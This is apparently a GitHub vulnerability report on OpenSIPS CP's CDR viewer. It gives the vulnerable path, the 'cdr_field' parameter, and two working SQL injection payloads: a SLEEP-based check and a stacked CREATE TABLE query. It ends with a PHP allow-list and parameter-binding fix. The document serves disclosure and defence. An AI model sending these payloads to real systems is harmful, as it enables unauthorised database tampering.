OpenSIPS/opensips-cp

OpenSIPS CP <= 9.3.2: CDR Search Action SQL Injection

Integration-IT opened this issue · 0 comments

Hello,

PATH:

/cp/tools/system/cdrviewer/cdrviewer.php

PARAM:

cdr_field (duration)

METHOD:

POST

INJECTION CHECK:

Payload: cdr_field=duration;SELECT SLEEP(5)#&search_regexp=0&start_year=2022&start_month=06&start_day=02&start_hour=23&start_minute=07&start_second=07&end_year=2022&end_month=06&end_day=02&end_hour=23&end_minute=07&end_second=07&export=Export

ARBITRARY COMMAND:

cdr_field=duration;CREATE TABLE Injection (id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,firstname VARCHAR(30) NOT NULL,lastname VARCHAR(30) NOT NULL,email VARCHAR(50),reg_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP)#&search_regexp=0&start_year=2022&start_month=06&start_day=02&start_hour=23&start_minute=07&start_second=07&end_year=2022&end_month=06&end_day=02&end_hour=23&end_minute=07&end_second=07&export=Export
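One way to handle the `cdr_field` input this report describes, as an added example (it is not OpenSIPS CP code and not part of the report): the column name is checked against a fixed list, the date fields are rebuilt from digits only, and the values go into bound parameters. The column list, the `cdrs` table, the `call_start_time` column and all function names are assumptions made for illustration.

```php
<?php
// Hypothetical list of searchable CDR columns (not taken from OpenSIPS CP).
const CDR_COLUMNS = ['duration', 'caller_id', 'callee_id', 'sip_call_id'];

// Column names cannot be bound as parameters: accept exact list matches only.
function cdr_column(mixed $raw): string
{
    if (!is_string($raw) || !in_array($raw, CDR_COLUMNS, true)) {
        throw new InvalidArgumentException('cdr_field is not a known column');
    }
    return $raw;
}

// Rebuild a timestamp from the six numeric form fields, digits only.
function cdr_timestamp(array $post, string $prefix): string
{
    $v = [];
    foreach (['year', 'month', 'day', 'hour', 'minute', 'second'] as $part) {
        $s = $post["{$prefix}_{$part}"] ?? null;
        if (!is_string($s) || !ctype_digit($s) || strlen($s) > 4) {
            throw new InvalidArgumentException("{$prefix}_{$part} must be numeric");
        }
        $v[] = (int) $s;
    }
    if (!checkdate($v[1], $v[2], $v[0]) || $v[3] > 23 || $v[4] > 59 || $v[5] > 59) {
        throw new InvalidArgumentException("{$prefix} is not a valid date and time");
    }
    return vsprintf('%04d-%02d-%02d %02d:%02d:%02d', $v);
}

// Returns [sql, params] for PDO::prepare() / execute(); `cdrs` is a hypothetical table.
function cdr_export_query(array $post): array
{
    $col = cdr_column($post['cdr_field'] ?? null);
    $sql = "SELECT call_start_time, `{$col}` FROM cdrs WHERE call_start_time BETWEEN :start AND :end";
    return [$sql, [':start' => cdr_timestamp($post, 'start'), ':end' => cdr_timestamp($post, 'end')]];
}

// Constructed requests: a plain field name, then the value from the report's injection check.
$dates = 'start_year=2022&start_month=06&start_day=02&start_hour=23&start_minute=07&start_second=07'
       . '&end_year=2022&end_month=06&end_day=02&end_hour=23&end_minute=07&end_second=07';
foreach (['duration', 'duration;SELECT SLEEP(5)#'] as $field) {
    parse_str($dates . '&cdr_field=' . rawurlencode($field), $post);
    try {
        echo cdr_export_query($post)[0], "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The exact-match check is what matters for `cdr_field`: escaping functions are meant for string values, not identifiers, so a value that is not literally one of the listed columns never reaches the SQL text.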